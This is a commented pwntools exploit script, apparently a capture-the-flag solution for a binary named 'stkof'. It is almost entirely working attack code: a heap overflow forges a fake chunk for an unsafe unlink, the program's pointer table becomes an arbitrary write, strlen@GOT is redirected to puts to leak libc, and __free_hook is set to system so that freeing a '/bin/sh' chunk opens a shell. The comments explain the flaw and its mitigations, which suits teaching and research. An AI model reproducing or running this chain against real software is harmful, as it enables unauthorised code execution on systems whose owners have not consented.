from pwn import *
# Launch the vulnerable binary locally and load the same file's ELF metadata
# (the GOT/PLT addresses used later come from `elf`, never from the process).
target = "./stkof"
p = process(target)
elf = ELF(target)
def malloc(size):
    """Menu option 1: ask the target to allocate `size` bytes.

    Drives the menu over the global `p` tube and echoes the target's reply
    up to its 'OK' marker. The slot index the program assigns is not parsed
    here, so the caller has to keep count itself.
    """
    for line in ("1", str(size)):
        p.sendline(line)
    print(p.recvuntil('OK'))
def free(index):
    """Menu option 3: release the chunk held in slot `index`.

    Sends the choice and the slot number on separate lines and echoes the
    target's reply up to 'OK'.
    """
    for line in ("3", str(index)):
        p.sendline(line)
    print(p.recvuntil('OK'))
def fread(index, length, data):
    """Menu option 2: write `data` into the chunk held in slot `index`.

    `length` is passed through to the target as the byte count it should
    read; nothing on this side clamps it to the chunk's allocated size, and
    the main script sends more bytes than the slot was allocated with. The
    target presumably trusts this caller-supplied length rather than the
    recorded allocation size -- that missing bound is the defect the rest of
    the script builds on, and the one a fix would have to add.
    """
    for line in ("2", str(index), str(length), data):
        p.sendline(line)
    print(p.recvuntil('OK'))
def len_check(index):
    """Menu option 4: ask the target to report on slot `index`.

    Unlike the other helpers this does not wait for an 'OK' marker: it reads
    up to 1024 bytes (the prompt / "enter input" text) and returns, leaving
    whatever the target prints next for the caller to read directly from `p`.
    NOTE(review): a single recv(1024) is a timing-dependent drain -- confirm
    it cannot also consume the bytes the caller reads afterwards.
    """
    for line in ("4", str(index)):
        p.sendline(line)
    p.recv(1024)  # drain the prompt ("enter input")
# Exploit chain, in four stages: (1) heap overflow into a fake chunk that
# free() unlinks, (2) the unlink turns the program's slot table into an
# arbitrary-write primitive and redirects strlen@GOT to puts, (3) an
# unsorted-bin chunk is dumped to leak a libc address, (4) __free_hook is
# pointed at system and a chunk holding "/bin/sh" is freed.
# Defensive context: the write in stage 1 is only possible because the
# target reads a caller-supplied length (see fread); full RELRO would block
# the GOT write in stage 2; and the malloc/free hooks this relies on were
# removed from glibc in 2.34, so the chain is specific to an older libc.

# ---- Stage 1: fake chunk + heap overflow, consumed by free(3) ----
# Presumably the address of one entry in the program's global table of chunk
# pointers (the arithmetic below suggests the entry for slot 2, with slot 1
# at pointer-0x08). NOTE(review): confirm against the binary -- the name
# alone does not establish this.
pointer = 0x602150
# Five same-sized allocations; the script assumes slots 2 and 3 end up
# adjacent on the heap so the oversized write into slot 2 reaches slot 3's
# chunk header.
malloc(0x80)
malloc(0x80)
malloc(0x80)
malloc(0x80)
malloc(0x80)
# Fake chunk laid out at the start of slot 2's user data:
#   prev_size = 0, size = 0x81 (0x80 | PREV_INUSE),
#   fd = pointer-0x18, bk = pointer-0x10.
# fd/bk are chosen so that fd->bk and bk->fd both read back as the table
# entry itself, which is exactly what glibc's "corrupted double-linked list"
# safe-unlink check compares -- so the check passes.
payload = p64(0)
payload += p64(0x81)
payload += p64(pointer-0x18)
payload += p64(pointer-0x10)
payload += "A"*0x60
# These two words land on slot 3's chunk header: prev_size=0x80 says the
# chunk before it (the fake one) is 0x80 bytes, and size=0x90 with the
# PREV_INUSE bit clear makes free(3) consolidate backwards and unlink it.
payload += p64(0x80)
payload += p64(0x90)
# len(payload) is larger than the 0x80 bytes slot 2 was allocated with:
# this is the out-of-bounds write the whole chain depends on.
fread(2,len(payload),payload)
# Backward consolidation unlinks the fake chunk; the unlink's side effect
# writes fd (pointer-0x18) over the table entry for slot 2, so slot 2 now
# "points" into the table itself.
free(3)

# ---- Stage 2: self-pointing table entry -> arbitrary write, strlen -> puts ----
# Writing through slot 2 now overwrites the table from pointer-0x18 onward:
# two zero words, then the entry at pointer-0x08 (presumably slot 1) becomes
# the GOT address of strlen.
payload = p64(0)*2
payload += p64(elf.got['strlen'])
fread(2,len(payload),payload)
# Slot 1 now aliases strlen@GOT; this 8-byte write replaces it with puts@plt,
# so a strlen() call inside the target (presumably the one behind menu option
# 4) becomes puts() on the chunk -- the leak primitive for stage 3.
fread(1,8,p64(elf.plt['puts']))

# ---- Stage 3: leak a libc address from an unsorted-bin chunk ----
# Two allocations too large for the fastbins; freeing slot 6 presumably
# places it in the unsorted bin, where its fd/bk point into libc's
# main_arena. The 0x99 request is carved from that free chunk, so the new
# slot's data starts with an arena pointer. NOTE(review): the slot numbers
# (6 and 8) are assumed from the allocation order, not checked.
malloc(0x100)
malloc(0x100)
free(6)
malloc(0x99)
# strlen -> puts: prints slot 8 up to the first NUL, i.e. the 6 significant
# bytes of the arena pointer.
len_check(8)
# NOTE(review): recv(6) returns *up to* 6 bytes; a short read makes u64()
# fail on length. 344 is the distance from the leaked pointer to main_arena
# and, like the three offsets below, is specific to one libc build.
main_arena = u64(p.recv(6)+"\x00\x00") - 344
malloc_hook = main_arena - 0x10
# Hard-coded libc offsets (__malloc_hook, system, __free_hook): any other
# libc version makes all of the following addresses wrong.
libc_base = malloc_hook - 0x3c4b10
system = libc_base + 0x45390
free_hook = libc_base + 0x3c67a8
print hex(malloc_hook)
print hex(libc_base)
print hex(system)

# ---- Stage 4: __free_hook -> system, then free a "/bin/sh" chunk ----
# Same table write as stage 2, this time making slot 1 alias __free_hook.
payload = p64(0)*2
payload += p64(free_hook)
fread(2,len(payload),payload)
fread(1,8,p64(system))
# A fresh chunk (presumably slot 9) holding the command string; freeing it
# calls __free_hook(ptr), i.e. system("/bin/sh"). The +1 on the length
# presumably accounts for the newline sendline appends.
malloc(0x105)
BinSH = "/bin/sh\x00"
fread(9,len(BinSH)+1,BinSH)
free(9)
p.interactive()